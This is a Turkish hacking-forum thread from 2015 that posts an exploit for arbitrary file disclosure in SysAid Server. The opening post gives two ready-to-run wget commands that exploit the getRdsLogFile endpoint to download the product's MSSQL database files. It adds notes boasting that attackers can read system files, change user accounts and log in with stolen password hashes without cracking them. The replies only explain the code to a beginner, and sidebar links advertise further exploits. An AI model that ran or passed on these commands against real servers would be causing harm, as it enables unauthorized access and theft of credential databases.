Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
SysAid Server Arbitrary File Disclosure
#1
Exploit =>
Kod:
wget -O "ilient.mdf" --header="Cookie:
JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient.mdf"

wget -O "ilient.ldf" --header="Cookie:
JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient_log.LDF"

Not => Saldırganlar için Sysaid Serverdaki siteler yetkili olmayan dosyalara direk okuma erişimi sağlıyor.Buraya giren kişi sitedeki kullanıcı hesaplarını değiştirebilir ve önemli sistem dosyalarını sadece okuyabilme ve indirebilme yetkisine sahip oluyorlar.

Not 2 => SysAid server veritabanı dosyalarınıa kullanıcı ve yönetici veya herhangi bir ID ile şifre hashını kullanarak direk girebilirsiniz. Hash kırmaya gerek yoktur.
Beğenenler:
#2
Bu Nedir Ustam
Beğenenler:
#3
(21-04-2015, Saat: 01:46)atakas Adlı Kullanıcıdan Alıntı: Bu Nedir Ustam

Bu kod exploit kodlar. Yani Sysaid kurulu sitelerde yetkili olmadğın halde sitedeki dosyaları sanki yetkiliymişssin okumanı ve sistem üzerindeki dosyaları okumanı sağlar. Yeni başlıyorsun buna hiç dokunma derim.
Beğenenler:
#4
(21-04-2015, Saat: 15:02)KingSkrupellos Adlı Kullanıcıdan Alıntı:
(21-04-2015, Saat: 01:46)atakas Adlı Kullanıcıdan Alıntı: Bu Nedir Ustam

Bu kod exploit kodlar. Yani Sysaid kurulu sitelerde yetkili olmadğın halde sitedeki dosyaları sanki yetkiliymişssin okumanı ve sistem üzerindeki dosyaları okumanı sağlar. Yeni başlıyorsun buna hiç dokunma derim.
Yeni Başlıyorum ve dokunmayacam kiss
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Wordpress "Js Support Ticket" File Upload Bypass Extensions Mr.F92 16 526 Bugün, Saat: 00:10
Son Yorum: Slowycan
  Joomla Fsave 2.0 Local File Disclosure Mr.F92 11 585 02-11-2016, Saat: 22:01
Son Yorum: Kolonkun
  Wordpress HackFile Disclosure Vulnerability archavin 2 486 26-10-2016, Saat: 18:45
Son Yorum: Kolonkun
  PvP SerVer Script SqL Inj. Vulnerabilities L3on4ns 25 1,996 09-03-2016, Saat: 20:57
Son Yorum: desmond
  MFM File Manager shell uploader Stallk3r 9 638 28-02-2016, Saat: 13:34
Son Yorum: M4TH1LD4
Anahtar Kelimeler

SysAid Server Arbitrary File Disclosure indir, SysAid Server Arbitrary File Disclosure Videosu, SysAid Server Arbitrary File Disclosure Online izle, SysAid Server Arbitrary File Disclosure Bedava indir, SysAid Server Arbitrary File Disclosure Yükle, SysAid Server Arbitrary File Disclosure Hakkında, SysAid Server Arbitrary File Disclosure Nedir, SysAid Server Arbitrary File Disclosure Free indir, SysAid Server Arbitrary File Disclosure Oyunu, SysAid Server Arbitrary File Disclosure Download


1 Ziyaretçi